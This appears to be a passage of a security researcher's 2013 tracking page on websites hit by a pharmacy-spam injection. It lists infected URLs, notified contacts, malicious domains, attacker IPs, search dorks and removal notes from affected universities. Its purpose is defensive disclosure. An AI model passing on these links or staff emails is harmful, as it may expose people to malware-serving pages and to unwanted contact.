None https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEQQFjACOAo&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fviagra-online-in-uk.html&ei=LzyNUtn3BeakiQKpy4HQBg&usg=AFQjCNEbYVboigtAtH_wKTKnPGUBLQ8YgA&sig2=rJRdjP-HKkhviEoTVdF0Ag
7. thehomeschoolvillage.com
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGIQFjAHOBQ&url=http%3A%2F%2Fwww.thehomeschoolvillage.com%2F2011%2F02%2Fhigh-school-locker-2.html&ei=xTyNUpLxOcyaigLB7oHgCQ&usg=AFQjCNFjqUPD0DuwSW6G9X-GKEa6t7uJew&sig2=Skh-eaQ0zLtnGFwSLxlNbQ
8. borah.highschoolmedia.org
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=61&ved=0CCsQFjAAODw&url=http%3A%2F%2Fborah.highschoolmedia.org%2Fviagra%2F&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNHhKdwut5QNy56CRqhgkzXsyJAltg&sig2=WI8SoscuejnJVLGdyre-Yg
9. butlercountyrecycles.org
Ohio
None https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fwww.butlercountyrecycles.org%2F%3Fi%3Dlevitracialisviagra&ei=20CNUsmNOqT2iwKlmYCYDw&usg=AFQjCNENtEFWFf1ovZ5MlrNX_vyO5LaRKw&sig2=wAM-hpKyOIo-osTkKRpylw
13. UCSC.EDU
California
help@ucsc.edu
chancellor@ucsc.edu
mdoyle1@ucsc.edu
yiz@soe.ucsc.edu

This page is still infected; notified again 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEkQFjAE&url=http%3A%2F%2Faia-society.ucsc.edu%2F.TemporaryItems%2F%3Fkukogiwa%3DNzA0OA-3D-3D%26tawyxiwa%3Dnews_viagra&ei=ykWNUpq1OoKmigL9w4DwDw&usg=AFQjCNEhu_03DihtVJicOGIIQSA35kPRTQ&sig2=URxafiN5OgOPONZpSBf-Bg

And many, many more infected pages, see

https://www.google.com/#q=site:ucsc.edu+viagra

10. www.ysunews.com
Youngstown State University
Ohio
chair@csis.ysu.edu
ElecCompEng@ysu.edu
police@ysu.edu
techdesk@ysu.edu

Notified 11-21-13

Still infected 11-30-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fwww.ysunews.com%2Fcanadian-viagra-prices%2F&ei=lUiNUsXXOYPDigKxvYDADQ&usg=AFQjCNEuPPaPmdqOJRXGVU4_-8smJTZ7ZA&sig2=Zp0yuDz9YDls2dlTQ2RvGA&bvm=bv.56988011,d.cGE
11. theconservationfoundation.org
Illinoisa
info@theconservationfoundation.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CEcQFjAGOBQ&url=http%3A%2F%2Fwww.theconservationfoundation.org%2Fwhat-we-do%2Feducation.html&ei=3UqNUpzeJYaZiAKg9IDwAg&usg=AFQjCNE1-XldlYZsyNqTmeW67WAsCKxpew&sig2=dtHBJ4ShGAi9A1YbMbt5EA&bvm=bv.56988011,d.cGE
12. naftd.org
North American Fire Training Directors
Washington, DC
naftd@fsi.illinois.edu
Mike.Richwine@fire.ca.gov
bstevens@dhses.ny.gov
billy.shelton@vdfp.virginia.gov

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=46&ved=0CFUQFjAFOCg&url=http%3A%2F%2Fwww.naftd.org%2Fsildenafil-viagra%2F&ei=lEuNUte4BIOsjALeioG4CA&usg=AFQjCNHqhIFNE9uSuPkHzsQEw0-PdwbT-A&sig2=H6O9pB1jRcR52LZ65aKUnQ&bvm=bv.56988011,d.cGE
13. ednf.org
Virginia
ednfstaff@ednf.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CDwQFjACODI&url=http%3A%2F%2Fwww.ednf.org%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D889%26Itemid%3D88888981&ei=jUyNUv2lEOS9iwL_o4CAAQ&usg=AFQjCNFc6I50Q7wbXpDZ1680o3koEfgAVQ&sig2=OWFFlkVIuRMJF7gHU6kkFw&bvm=bv.56988011,d.cGE
14. lyndonstate.edu
Vermont
HelpDesk@lyndonstate.edu
Registrars@lyndonstate.edu
George.Hacking@lyndonstate.edu
Keith.Chamberlin@Lyndonstate.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CC0QFjAAOCg&url=http%3A%2F%2Fmeteorology.lyndonstate.edu%2Fforecast%2Ftime.php%3Fodi%3Donline-canadian-viagra-sales%26on%3D1&ei=Kk6NUubIIo3piwL83YDQDQ&usg=AFQjCNFCPJjKw3fN7-anvj_iKHw6ROTEoQ&sig2=DLswaN_RBMEbi42u7IMMcg&bvm=bv.56988011,d.cGE
15. asu.edu
Arizona
abuse@asu.edu
security@asu.edu
Michael.Crow@asu.edu
dcst@asu.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CGQQFjAIOAo&url=http%3A%2F%2Farchaeology.la.asu.edu%2F_themes%2F_vti_cnf%2Flow.php%3Fp%3Dcanadian-pharmacy-free-viagra&ei=7U-NUrDiPOn5iQLGqYCoAQ&usg=AFQjCNED16sZxd4ahCjN3O2SLZoT0WSHVA&sig2=r5ioL9mE24-tMnimU8kEoQ&bvm=bv.56988011,d.cGE
16. asea.org
Alabama State Employees Association
http://www.asea.org/?p=931
http://www.asea.org/?p=954
http://www.asea.org/?p=2074
http://www.asea.org/?p=842
http://www.asea.org/?p=321
http://www.asea.org/?p=440
17. adelstjohnchurch.org.uk
"Down for maintenance" but malware is still up https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=139&ved=0CGgQFjAIOIIB&url=http%3A%2F%2Fwww.adelstjohnchurch.org.uk%2F4.6.5%2Findex.php%2Fzyrb-viagra-online-ordering.php&ei=OFONUvySO8KciQLxgIGICw&usg=AFQjCNFkbkRRsacMYaMImbhh33lJkSEVTw&sig2=phMUywKSmMtI7v_99utLiA&bvm=bv.56988011,d.cGE
18. tjus.org
Embassy of Tajikistan to the USA
http://www.tjus.org/component/content/article/13-slide-news/133-the-annual-message-of-the-president-of-the-republic-of-tajikistan-he-mr-emomali-rahmon-to-the-majlisi-oli-of-the-republic-of-tajikistan
19. un-grasp.org
United Nations Great Ape Survival Project, Nairobi, Kenya
grasp@unep.org
info@bornfree.org.uk

Notified on 11-25-13

www.un-grasp.org/?p=703‎
20. http://choctawindians.net/
Choctawhatchee High School
Florida
choctawweb@mail.okaloosa.k12.fl.us
andersonk@mail.okaloosa.k12.fl.us
Katherine.White@mail.okaloosa.k12.fl.us

Notified on 11-25-13

www.choctawindians.net/brand-viagra-online-without-prescription/

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=265&ved=0CEoQFjAEOIQC&url=http%3A%2F%2Fwww.choctawindians.net%2Fbrand-viagra-online-without-prescription%2F&ei=0leNUsKnNcikiQK4qIGQBA&usg=AFQjCNEj2QGhtBnGxfleoXHHksnAeAwzFQ&sig2=AjpeEcNQJ-oe3YqedG-VYA&bvm=bv.56988011,d.cGE

21. http://www.efig.eu.com/
UK
info@efig.org.uk

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=280&ved=0CHcQFjAJOI4C&url=http%3A%2F%2Fwww.efig.eu.com%2Fwhere-to-buy-viagra-in-singapore-pharmacy&ei=MlmNUs-bI-OUiALh7IDADw&usg=AFQjCNGVrrN67AujnfqqqaCmdg8B9h4ahw&sig2=qGqYrHfcXbhhAOihnFJCqw&bvm=bv.56987063,d.cGE
22. http://nyslc.net/
New York State Lifeguard Corps
none https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHIQFjAJ&url=http%3A%2F%2Fnyslc.net%2Findex.php%2Fwtlm-school%2520of%2520pharmacy%2520in%2520ontario%2520canada.php&ei=qVuNUqTaOKe9igKrtIDwDA&usg=AFQjCNG-PDdMqj27QB2GzE5hrn0gwp4tLg&sig2=Hkvo6PIbEVy0kr3_4z53WQ&bvm=bv.56987063,d.cGE
23. RUTGERS.EDU
New Jersey
abuse@RUTGERS.EDU
security@RUTGERS.EDU
colhenry@rci.rutgers.edu
james.breeding@rutgers.edu
phenry@oldqueens.rutgers.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CFwQFjAG&url=http%3A%2F%2Fiamdn.rutgers.edu%2F~chapin%2Fwordpress%2Fwp-content%2Fplugins%2Fakismet%2F%3Fqewosoli%3DODc4%26lajywi%3Dosbon_representative_pump_erectile_dysfunction&ei=2V2NUo-EDaroiwKtzYD4Cg&usg=AFQjCNHXMIhavlNOHGML6advvKev4_eMAA&sig2=RKitik6bOVhEEnaOB4TlnQ&bvm=bv.56987063,d.cGE
24. davisenergy.com
California
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fdavisenergy.com%2F%3Fp%3Duk_viagra&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNGJpKpwKyp8FcyREBZ_7Pkmc1o4UA&sig2=COL7028lufdKNM-1Q92EeA&bvm=bv.56987063,d.cGE
25. iospress.nl
Multinational
editorial@iospress.nl
iospress@accucoms.com
theo@vandebilt.co.uk

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEoQFjAEOAo&url=http%3A%2F%2Fwww.iospress.nl%2Ffemale-viagra-jelly%2F&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNE2Mw3UMfx25HUkPpo9BER0tDPbig&sig2=66GB1Y1UBghBggU53rVI4g&bvm=bv.56987063,d.cGE
26. ctvoterscount.org
Connecticut
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFEQFjAFOAo&url=http%3A%2F%2Fwww.ctvoterscount.org%2F%3Fo%3Da1383&ei=1F6NUsHbDYidjALR04CgCg&usg=AFQjCNG73nDYuVOh706t0AtvgUR4MGiRMA&sig2=lfCRoSwak5DBJ1R_KZkhiA&bvm=bv.56987063,d.cGE
27. al-imanschool.org
New York
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CE4QFjAD&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fcheap-viagra-canadian.html&ei=nJCNUoznL8m3iwKc2IGQCA&usg=AFQjCNGqjNiTWaPPnkq-SobFhj26swhLqg&sig2=knHJ2JPW7GxtvVMXVeTC4Q&bvm=bv.56987063,d.cGE
28. valentinoachakdeng.org
South Sudan
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0CEEQFjABOAo&url=http%3A%2F%2Fwww.valentinoachakdeng.org%2Fblog%2Ftest%2Fmarial-bai-secondary-school-summer-2011%2F&ei=iJGNUrn6FoWWiAL8w4HoCA&usg=AFQjCNGSp0KjbnCJ1dJrAhFbC-4zYBK8wg&sig2=Ga1IKFnBXkIpXo5GtEbLFw&bvm=bv.56987063,d.cGE
29. mlhsss.gov.gy
Guyana
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDsQFjAAOBQ&url=http%3A%2F%2Fwww.mlhsss.gov.gy%2Findex.php%3Foption%3Dcom_content%26view%3Darticle%26id%3D237%3Agovt-to-train-a-further-4000-early-school-leavers-in-2010%26catid%3D9%3Aindustrial-training&ei=l5KNUveuHcWviAKXiIGYAw&usg=AFQjCNEm7SOQ2W01DDi0J6MQVNLueLOO1g&sig2=AbC4eFFgzTCgIvn_iT03hA&bvm=bv.56987063,d.cGE
30. caterpillarsschool.com
India
info@caterpillarschoolschool.com

Notified on 11-25-13

http://caterpillarsschool.com/catpresch/caterpiller/index.php?q=node/1028
31. qomchurch.org
parishoffice@qomchurch.org

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHsQFjAJOB4&url=http%3A%2F%2Fwww.qomchurch.org%2Ffaith-formation%2Fvacation-bible-school.html&ei=zZONUsGvDMH9iwKhlYCgBg&usg=AFQjCNG-TYVhss0rzMo9rsjIPBAlmJEDgQ&sig2=HrJ5718E0uUTBABIDkIdmg&bvm=bv.56987063,d.cGE
32. alchemytechniques.com
North Carolina
info@alchemytechniques.com

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CEcQFjACODI&url=http%3A%2F%2Fwww.alchemytechniques.com%2Fhealing-school%2Fbeginning-structural-self-inquiry%2F&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGbhPox9rB7RqVRjRV4RcSyxj-lsw&sig2=OvpB88RHAxXTUPV-eQr5qA
33. rabsonmanor.co.uk
info@rabsonmanor.co.uk
http://www.fifthape.co.uk/contact.php

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=58&ved=0CG4QFjAHODI&url=http%3A%2F%2Frabsonmanor.co.uk%2Fhknbcmfhypothyroidismandarrythmiachabans%2Fcullen-trinity-medical-school-st-babaramori-fratus.html&ei=_paNUvjMHeaxiwKzxYC4Dg&usg=AFQjCNGhomqReNg7bhyb-jnjGJqocK8LYw&sig2=jfNdgiLi98Jw8epjm72wjw
34. fifthape.co.uk
http://www.fifthape.co.uk/contact.php

Notified on 11-25-13

http://fifthape.co.uk/xdchrockland/patients-have-been-known-to-chew-straight-through-bwsze.html

http://fifthape.co.uk/xdchmetaclopromidejhamper/the-challenge-with-this-life-threatening-disease-systers.html

http://fifthape.co.uk/xdchwheelcartsvertaalde/liposarcomas-in-this-region-as-primary-tumors-a-mesapotamia.html

35. lbhs.ca
Lord Beaverbrook High School, Canada
LordBeaverbrook@cbe.ab.ca
BoardofTrustees@cbe.ab.ca
ChiefSuperintendent@cbe.ab.ca
corpsec@cbe.ab.ca

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=70&ved=0CHwQFjAJODw&url=http%3A%2F%2Fwww.lbhs.ca%2Fschool-clubs%2F&ei=eamNUr9OiISLAty6gOgF&usg=AFQjCNGu3kjLWK21kzW2Vb67M4BlRGa-2A&sig2=u0lxqihtoSB-qzOFalKJYw

36. damselsinsuccess.com
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=85&ved=0CEkQFjAEOFA&url=http%3A%2F%2Fwww.damselsinsuccess.com%2Fwhy-some-women-are-taking-back-to-school-instead-of-work%2Fwomen-in-school-mailroom%2F&ei=AauNUsKIJKWUiAKS4YHQDA&usg=AFQjCNGDwTU64fNJbbRQtKqvl05Ws7kZqw&sig2=TyF8HZaMUE-uS_9OJQ5zkg

Uses Wordpress 3.7.1 and Plugin WP Missed Schedule 2013.1024.8888; both up-to-date. Also uses mailchimp, I cannot determine version. Uses contact-form-7; cannot determine version. Uses better-related plugin, v. 0.3.5? --current version is 0.4.3.4. Also linksalpha.com/widgets/buttons plugins for Facebook Open Graph and Google Plus.

37. starbene.it
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=91&ved=0CCsQFjAAOFo&url=http%3A%2F%2Fwww.starbene.it%2Ftag%2Fandrews-dance-school%3Fc3rhc%3D197602&ei=WquNUvHgEaf8iwKMlYHoCA&usg=AFQjCNF2mMnULd70T-lA69hjXRGuyVMqsQ&sig2=HKTFxLQ4PzqxGbmjZee2cQ

38. artloversnewyork.com
nsmith0014@aol.com

Notified on 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGMQFjAH&url=http%3A%2F%2Fwww.artloversnewyork.com%2Fzine%2Fcategory%2Fthe-bomb%2Fpage%2F14%2F&ei=WK2NUuCYAuSujAKs74GoCQ&usg=AFQjCNE1WXwlWnFy2vOPqz_9I2RK_N71rA&sig2=aMH7-xPXKRj0xAPWG__Kdw&bvm=bv.56987063,d.cGE

Wordpress 3.3.2 (current is 3.7.1); no apparent plug-ins

39. auraltimes.com
Blog abandoned since 2007, but still infected
php https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CDoQFjACOAo&url=http%3A%2F%2Fauraltimes.com%2F%3Fp%3Dbuy_viagra_online_canadian_phamacy&ei=MK-NUp-sAeHFigLexYHgAQ&usg=AFQjCNHLukHxXjdzuXervSj6Sb7Vmczotw&sig2=_ELWsjyP_JXDk_Sm05EM9w&bvm=bv.56987063,d.cGE

Timing

The malicious domain securedata24.com was registered on April 1, 2013 for one year:

http://www.whoismind.com/whois/securedata24.com.html

I therefore suspect that this infection comes about by automated exploitation, since there is at least one site that has obviously been abandoned since 2007 that is infected. I doubt the webmaster was clicking on links this year.

I have also seen several infected sites which have had the database crash, which may be due to the infection causing collateral damage.

7. Eight More Sites

I used these Google searches:
intitle:viagra intitle:canadian "information security"
intitle:viagra intitle:kaiser
Organization Emails Malicious URL
1. rip.org.uk
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CF8QFjAF&url=http%3A%2F%2Fwww.rip.org.uk%2Fyqsa-order_viagra_online_canadian_pharmacy.php&ei=PDaOUuiRGIeliQLdkoGIDg&usg=AFQjCNHR4NZhIPhK0OVaojRWpCL20e01cw&sig2=46EQSTSYMkX3xBcLJpqqDg&bvm=bv.56988011,d.cGE
2. cbcmagazine.com
Cleveland, Ohio
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CGIQFjAFOAo&url=http%3A%2F%2Fwww.cbcmagazine.com%2Findex.php%2Ftjem-viagra_generic_paypal_discount.php&ei=eDeOUpGnJ4GwiQKvhYGgBA&usg=AFQjCNGdRhwztb_lZ-SXnRtOkrOHQdwAnQ&sig2=hi1NTXCWOrxRx5mp8YlHOA&bvm=bv.56988011,d.cGE
3. Turkey
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CEkQFjACOBQ&url=http%3A%2F%2Fyenerveyener.com%2Findex.php%2Fdpzt-female%2520viagra%2520order%2520on%2520web.php&ei=ATiOUrGWKMOGjAKf0oHYDQ&usg=AFQjCNG3tUFfORbWJmSAfIfEbTFdNbgvHQ&sig2=fH0bEdmSCIliOPuj8BtFwA&bvm=bv.56988011,d.cGE
4. mcm.edu
Texas
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=36&ved=0CFAQFjAFOB4&url=http%3A%2F%2Fmy.mcm.edu%2F%3FTaki%3Dcheap-viagra-uk-paypal-drug&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNFx5kXmNFD27aHEvZ8IdqL0cEkXOg&sig2=zuc5Zlakv5l8ZKpE9jfEMg&bvm=bv.56988011,d.cGE
5. procue.info
Spain
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGYQFjAIOB4&url=http%3A%2F%2Fwww.procue.info%2Flqks-viagra%2520online%2520canadian%2520pharmacy%2520paypal%2520tablets.php&ei=ejiOUvmWMquZjALrmIHgBw&usg=AFQjCNHJ7hxjmOscuDIMFxwi41URdQXt4Q&sig2=bEPeCwyGfW1Vz4TcV0dMhA&bvm=bv.56988011,d.cGE
6. grw.co.nz
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=63&ved=0CD4QFjACODw&url=http%3A%2F%2Fwww.grw.co.nz%2Findex.php%2Fohav-how%2520to%2520get%2520viagra%2520over%2520the%2520counter.php&ei=NDqOUsK_JMvriQLwiYDABQ&usg=AFQjCNF-x9aHVnFahOnHE8M359njMgSFuw&sig2=_v2H5RRDYJQ4Sh5sMMAKZw&bvm=bv.56988011,d.cGE
7. virginia.edu
Virginia
abuse@virginia.edu
security@virginia.edu
compe@virginia.edu
lowe@virginia.edu
patricia@virginia.edu

Notified 11-21-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIABEBYwCA&url=http%3A%2F%2Fwww.career.virginia.edu%2Ffeeds_old%2Fplaylister%2F%3Fall%3Dviagra-kaiser%26is%3D1&ei=Bz-OUtaVIsaIiAK7roGADQ&usg=AFQjCNGSEjjrariwmaty0iuau_KguJ0pOA&sig2=T9C5pTLrj-PdnkNKRvMvpg&bvm=bv.56988011,d.cGE
8. udg.edu
Spain
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=99&ved=0CGcQFjAIOFo&url=http%3A%2F%2Flequia.udg.edu%2Fold%2Fthickbox%2F%3Frai%3Dkaiser-viagra%26cd%3D2&ei=1kKOUu6ODuOUiAKA1ID4Cw&usg=AFQjCNEfX3T-vDdXde0a4gz-pTJihmG3SQ&sig2=_fXXIY8W0aBSzf0GxyeLMg

8. Removal Tips from KWC

I received this message today (11-21-13) with the first detailed information from an infected college.

Thanks, Jared!

Thank you for your write up on KWC's site infection. We've been working to eradicate the virus, and think we've removed it now. We've been able to temporarily remove it in the past, but it reestablished itself. It also changed in the way it worked after we removed it once, which made it harder to track down. Originally it was using the htaccess file to rewrite browser details to Google and Yahoo, but then it switched to prepend a php file to every page using the php.ini file. There were several other access points they has created using php's eval command to post code to our server. We've, of course, removed those now and taken other preventative steps in the hope that it is gone for good now.

Your write up was very helpful, though, and I'm sharing this with you in the hope that it will help the other sites you've discovered to contain the same issue.

Jared Ehrenheim for KWC.edu

I checked the first ten hits with this search, and they are no longer infected. Looks like KWC has it fixed!
inurl:kwc.edu viagra

9. Removal Tips from UARK

I received this message today (11-21-13) with detailed information from UARK.EDU.

Thanks, Don!

I think your use of Google Dorks is useful, but not definitive. We used to rely heavily on Google Dorks and Google Alerts to keep an eye out for activity like this, but those tools have become increasingly unreliable over the last few years. As case in point, using the search you offer as an example (modified to single us out):

inurl:uark.edu viagra-online-100mg

We were at first unable to locate any record of defacement (including the site you reported). We later located the following URL (still no sign of your reported site):

www.uark.edu/misc/space/viagra/?id=Buy-Viagra-online-100mg

However, that particular site has been off-line for some time, so any attack would be quite old. Today, the Google search again returns no results.

Another interesting point is that our hacked site did not use securedata24.com for redirect. Instead, it uses keycollector.pw, which was registered on 20 April, near the same time as securedata24.

Again, thank you for taking the time to alert us.

From Don Faulkner

I tested the first ten hits for this dork on 11-21-13, and they were all clean. So I think they got it cleaned off!
inurl:uark.edu viagra

10. Conflicting reports about botnet behavior (11-22-13)K

I asked two infected schools if they see remote control signals from the infected machines, and got these replies.

From Don Faulkner, UARK.EDU:

We saw no evidence of remote control or botnet-like behavior. The affected site did not house sensitive data.
From Jared Ehrenheim, KWC.EDU:
I've also discover POST requests to one of the infected PHP files coming from two different Netherlands registered IP addresses: 46.249.58.18 and 95.211.111.78

I've blacklisted those, but I anticipate there are more.

46.249.58.18 is marked as a spam source Spamhaus:

http://www.mywot.com/en/scorecard/46.249.58.18

I can't find any reports of malicious activity from 95.211.111.78

What we really could use now is a sample of the malware. PCAP files of the traffic would be good too. If anyone at infected colleges can help, please email me: sbowne@ccsf.edu

11. Finding Local Businesses

I tried to find local businesses that were infected, in the hopes of analyzing an infection myself.

I used these Google searches:

"viagra online 100mg" san francisco california
viagra Canadian san francisco california
san francisco intitle:viagra
Organization Emails Malicious URL
1. 12ozprophet.com
NYC, I think
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG4QFjAG&url=http%3A%2F%2Fwww.12ozprophet.com%2Fnews%2Fphotos_nyc_2nd_avenue_subway_construction%3Fmtjve%3D350000&ei=IDCQUsaIBc_3oASx2oHADw&usg=AFQjCNFQC18xz-rFE-3ZMXb423dWuEMJ_w&sig2=v2Q9ISoppnLGAMODwNdFtA&bvm=bv.56988011,d.cGU
2. http://www.ediblecommunities.com/
They have an office in San Francisco
ediblesanfrancisco@gmail.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFsQFjAGOAo&url=http%3A%2F%2Fwww.ediblecommunities.com%2Fcontent%2Fedible-stories.htm%3Fm%3D201008%26zwrpy%3D664050&ei=5TGQUrjkL9XroATKpIII&usg=AFQjCNF4qEKLcWjuDwsL3S4RfqAwWpkDIw&sig2=LU6d4sozjgv2fOVunTCOYQ&bvm=bv.56988011,d.cGU
3. californiarowingclub.com
Oakland
Page is infected with JS.HideMe-J [Trj] http://www.californiarowingclub.com/index.php/programs
4. hpfirefighter.com
North Carolina
http://hpfirefighter.com/2013/08/video-sheds-light-on-flight-214-passengers-death/
5. merolaopera.com
Merola Opera Program
War Memorial Opera House
301 Van Ness Avenue
San Francisco, CA 94102-4509 USA
Phone: 1.415.565.6427
Fax: 1.415.565.3254
Email: mop (at) sfopera.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFMQFjAF&url=http%3A%2F%2Fmerolaopera.com%2Fstaff&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNGhq8bXPIE0WA33s9k0Yb0pDMcMsg&sig2=WH0dfbpc94wNCNx5Oj6VvA
6. lautze.com
San Francisco Office (Main Office)
303 Second Street, Suite #950
San Francisco CA 94107
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGIQFjAH&url=http%3A%2F%2Fwww.lautze.com%2Flinks.html&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNH44eFZ5TccxVHVJ4yumgzeIwwFYA&sig2=E8f2Qz8zEhw4ocV2wZGu0w
7. webchaver.org
NJ; a browser security product
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CEcQFjAEOBQ&url=http%3A%2F%2Fwebchaver.org%2Fcanadian-online-pharmacy-viagra-no-prescription%2F&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHk15_HlSxWBiWdQ1zAINxAv4gWEg&sig2=uFh6AX5-yil6xvFuvye8nA
8. advancedhomeenergy.com
1356 S 50th St, Richmond, CA 94804
Ph: (510) 540-4860
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGYQFjAIOBQ&url=http%3A%2F%2Fwww.advancedhomeenergy.com%2Fhome&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHSO_MyJPjunQLz5sL9xcRWJL7U6Q&sig2=PwtC-mHr9KwnoQPBnGI9Tg
9. mixeddimensions.com
181 Fremont st., San Francisco, CA 94105
info@mixeddimensions.net

Notified 11-25-13

mixeddimensions.com/?xb=594‎
Not the same infection, hosted locally
10. ismrm.org
International Society for Magnetic Resonance in Medicine
2030 Addison Street, 7th Floor
Berkeley, CA 94704 USA
Tel: +1 510-841-1899
Fax: +1 510-841-2340
info@ismrm.org

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHEQFjAJOB4&url=http%3A%2F%2Fwww.ismrm.org%2F13%2Ftp09.htm&ei=0TqQUpWLJczZoASLvoDIAw&usg=AFQjCNH3Mebg6q2RERfICm_v4cLaKXas9g&sig2=fDjkigFKsFZgTbut9vp4ng
11. pinkberry.com
3130 Wilshire Blvd, 4th Floor, Santa Monica, CA 90403 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CEkQFjAEOCg&url=https%3A%2F%2Fwww.pinkberry.com%2Ffrozen-yogurt-store%2Fus%2Fca%2Flos-angeles%2F92%2Flax%3Fcglua%3D640342&ei=xjyQUuDDMNjmoATBoIKgBg&usg=AFQjCNGKOgdOmrs-gqHEkUSB-P_K5NSnAg&sig2=E9GC65JDjCFmxyPRgGsNFw
12. enterprisecontinuity.com
A cybersecurity company
DISASTER RESOURCE GUIDE | PO Box 15243, Santa Ana, CA 92735 | TEL 714.558.8940 | FAX 714.558.8901
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=115&ved=0CEYQFjAEOG4&url=http%3A%2F%2Fwww.enterprisecontinuity.com%2F%3Fceisprernte279%3Dcanadian-pharmacy-viagra-100mg&ei=pj-QUvL7IsPzoATbxIDoAw&usg=AFQjCNGQ5CC0HXNIc6q7fS0cWOpd0nE9Cg&sig2=pmBWVzx3V-qzdleRDGMLqA
13. metrostudy.com
Washington, DC
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F%2Fwww.metrostudy.com%2Fexternals%2Fskydeck-store%2Findex.php%3Fq%3Dbuy-viagra-in-san-francisco-77&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHha6MJd4ui5T4zTJYEBy-wHttktw&sig2=o9PbT6lWJhPJsSk3RtwDKQ&bvm=bv.56988011,d.cGU
14. rivnet.com
Texas
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fbuy-viagra-in-san-francisco.html&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNE4lowkUqpEG3tZ82JcxJsakQPaVA&sig2=8lKR4_vM_K4Vl7P-q0D4DA&bvm=bv.56988011,d.cGU
15. wwpinfo.com
NJ
